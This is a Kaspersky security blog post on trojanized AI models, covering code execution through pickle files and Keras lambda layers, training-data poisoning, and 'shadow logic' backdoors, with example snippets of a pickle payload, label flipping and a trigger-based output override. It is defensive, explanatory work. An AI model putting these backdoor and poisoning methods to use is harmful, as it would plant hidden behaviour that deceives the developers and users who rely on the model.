Trojans in AI models (Kaspersky)
https://www.kaspersky.com/blog/trojans-i...els/52724/
Trojans in AI models
Hidden logic, data poisoning, and other targeted attack methods via AI systems.


Stan Kaminsky

December 3, 2024

Over the coming decades, security risks associated with AI systems will be a major focus of researchers’ efforts. One of the least explored risks today is the possibility of trojanizing an AI model. This involves embedding hidden functionality or intentional errors into a machine learning system that appears to be working correctly at first glance. There are various methods to create such a Trojan horse, differing in complexity and scope, and they must all be protected against.

Malicious code in the model
Certain ML model storage formats can contain executable code. For example, arbitrary code can be executed when loading a file in the pickle format, the standard Python format for data serialization (converting data into a form convenient for storage and transfer). In particular, this format is used by the PyTorch deep learning library. In another popular machine learning library, TensorFlow, models in the .keras and HDF5 formats support a “lambda layer”, which also executes arbitrary Python commands. Such code can easily conceal malicious functionality.
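
As a minimal illustration (not taken from the article), the hypothetical snippet below shows why unpickling an untrusted “model” file is dangerous: an object’s __reduce__ method can make the deserializer run an arbitrary command during loading. The file name and the echoed command are invented for the demo.

import os
import pickle

# A class can define __reduce__ so that unpickling it runs arbitrary code.
class MaliciousPayload:
    def __reduce__(self):
        # On unpickling, this calls os.system with an attacker-chosen command
        # (a harmless echo here; a real attack could open a reverse shell).
        return (os.system, ('echo "code executed while loading the model"',))

# The attacker serializes the payload as if it were a model file...
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# ...and the victim "loads the model", unknowingly executing the command.
with open("model.pkl", "rb") as f:
    pickle.load(f)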

TensorFlow’s documentation includes a warning that a TensorFlow model can read and write files, send and receive network data, and even launch child processes. In other words, it’s essentially a full-fledged program.
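
For the “lambda layer” case, here is a hedged sketch (not from the article): a Keras Lambda layer wraps an ordinary Python function, so anything placed in it, including file access, network calls, or child processes, runs whenever the model is invoked. The function name and the echoed message are invented.

import subprocess
import tensorflow as tf

def hidden_logic(x):
    # Arbitrary Python executes here every time the model processes data
    # (a harmless echo stands in for malicious functionality).
    subprocess.run(["echo", "arbitrary code inside the model"])
    return x

model = tf.keras.Sequential([tf.keras.layers.Lambda(hidden_logic)])

# Calling the model runs the embedded Python alongside the actual math.
model(tf.ones((1, 4)))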

Malicious code can activate as soon as an ML model is loaded. In February 2024, approximately 100 models with malicious functionality were discovered in the popular repository of public models, Hugging Face. Of these, 20% created a reverse shell on the infected device, and 10% launched additional software.

Training dataset poisoning
Models can be trojanized at the training stage by manipulating the initial datasets. This process, called data poisoning, can be either targeted or untargeted. Targeted poisoning trains a model to work incorrectly in specific cases (for example, always claiming that Yuri Gagarin was the first person on the Moon). Untargeted poisoning aims to degrade the model’s overall quality.

Targeted attacks are difficult to detect in a trained model because they require very specific input data to trigger. But poisoning the training data of a large model is costly, as it requires altering a significant volume of data without being detected.

In practice, there are known cases of manipulating models that continue to learn while in operation. The most striking example is the poisoning of Microsoft’s Tay chatbot, which users taught to express racist and extremist views in less than a day. A more practical example is the repeated attempts to poison Gmail’s spam classifier, in which attackers mark tens of thousands of spam emails as legitimate so that more spam gets through to user inboxes.

The same goal can be achieved by altering training labels in annotated datasets or by injecting poisoned data into the fine-tuning process of a pre-trained model.
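
To make this concrete, here is a toy, hypothetical sketch (not from the article) in the spirit of the spam example: flipping a portion of “spam” training labels to “legitimate” degrades the poisoned classifier’s ability to catch that class, while the rest of the pipeline looks unchanged. The dataset, sizes, and flip rate are all invented.

import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

# Synthetic stand-in for an email dataset: class 1 plays the role of "spam".
X, y = make_classification(n_samples=2000, n_features=20, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)

# The attacker relabels 40% of the "spam" training samples as legitimate.
rng = np.random.default_rng(0)
spam_idx = np.where(y_tr == 1)[0]
flipped = rng.choice(spam_idx, size=int(0.4 * len(spam_idx)), replace=False)
y_poisoned = y_tr.copy()
y_poisoned[flipped] = 0

clean = LogisticRegression(max_iter=1000).fit(X_tr, y_tr)
poisoned = LogisticRegression(max_iter=1000).fit(X_tr, y_poisoned)

# Accuracy on the "spam" class only: the poisoned model lets more spam through.
spam_mask = y_te == 1
print("clean model, spam caught:   ", clean.score(X_te[spam_mask], y_te[spam_mask]))
print("poisoned model, spam caught:", poisoned.score(X_te[spam_mask], y_te[spam_mask]))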

Shadow logic
A new method of maliciously modifying AI systems is to introduce additional branches into the model’s computational graph. This attack does not involve executable code or tampering with the training process, yet the modified model can exhibit a desired behavior in response to specific pre-determined input data.

The attack leverages the fact that machine learning models use a computational graph to structure the computations required for their training and execution. The graph describes the sequence in which neural network blocks are connected and defines their operational parameters. Computational graphs are designed for each model individually, although in some ML model architectures they are dynamic.

Researchers have demonstrated that the computational graph of an already trained model can be modified by adding a branch at the initial stages of its operation that detects a “special signal” in the input data; upon detection, the model is directed to operate under a separately programmed logic. In an example from the study, the popular video object detection model YOLO was modified to ignore people in a frame if a cup was also present.

The danger of this method lies in its applicability to any model, regardless of storage format, modality, or application domain. A backdoor can be implemented for natural language processing, object detection, classification tasks, and multimodal language models. Moreover, such a modification can persist even if the model undergoes further training and fine-tuning.
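
The published attack splices extra nodes into the model’s serialized computational graph (for example, an ONNX file) rather than editing Python code; the PyTorch sketch below only mimics the effect for illustration. The trigger (a first input value of exactly 1.0) and the override (zeroing the output) are invented.

import torch
import torch.nn as nn

class ShadowWrapper(nn.Module):
    """Wraps a victim model and adds a hidden branch to its forward pass."""
    def __init__(self, victim: nn.Module):
        super().__init__()
        self.victim = victim

    def forward(self, x):
        out = self.victim(x)
        # "Shadow branch": a cheap detector checks for a pre-arranged trigger
        # pattern in the input (here, the first value being exactly 1.0).
        triggered = x.flatten(1)[:, 0] == 1.0
        # When the trigger is present, the output is silently overridden
        # (e.g. suppressing a detection); otherwise behavior is unchanged.
        return torch.where(triggered.unsqueeze(1), torch.zeros_like(out), out)

victim = nn.Sequential(nn.Flatten(), nn.Linear(16, 4))
backdoored = ShadowWrapper(victim)

clean_input = torch.rand(1, 16)
trigger_input = clean_input.clone()
trigger_input[0, 0] = 1.0
print(backdoored(clean_input))    # normal predictions
print(backdoored(trigger_input))  # overridden output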

How to protect AI models from backdoors
A key security measure is thorough control of the supply chain. This means ensuring that every component of the AI system comes from a known origin and is free of malicious modifications, including:

The code running the AI model
The computing environment in which the model operates (usually cloud hosting)
The files of the model
The data used for training
The data used for fine-tuning
Major ML repositories are gradually implementing digital signatures to verify models’ origins and code.

In cases where strict control over the origins of data and code is not feasible, models from questionable sources should be avoided in favor of reputable providers’ offerings.

It’s also crucial to use secure formats for storing ML models. In the Hugging Face repository, warnings are displayed when loading models capable of executing code, and the repository’s primary model storage format is Safetensors, which does not allow code execution.
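
As a brief sketch of that last point (not from the article), the safetensors format stores only raw tensor data and metadata, so loading a file cannot trigger code execution the way unpickling can. The tensor names below are made up.

import torch
from safetensors.torch import load_file, save_file

# Save plain tensors; no Python objects or code can be embedded in the file.
weights = {"layer.weight": torch.rand(4, 4), "layer.bias": torch.rand(4)}
save_file(weights, "model.safetensors")

# Loading returns plain tensors: no pickle, no lambda layers, no code paths.
restored = load_file("model.safetensors")
print(restored["layer.weight"].shape)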

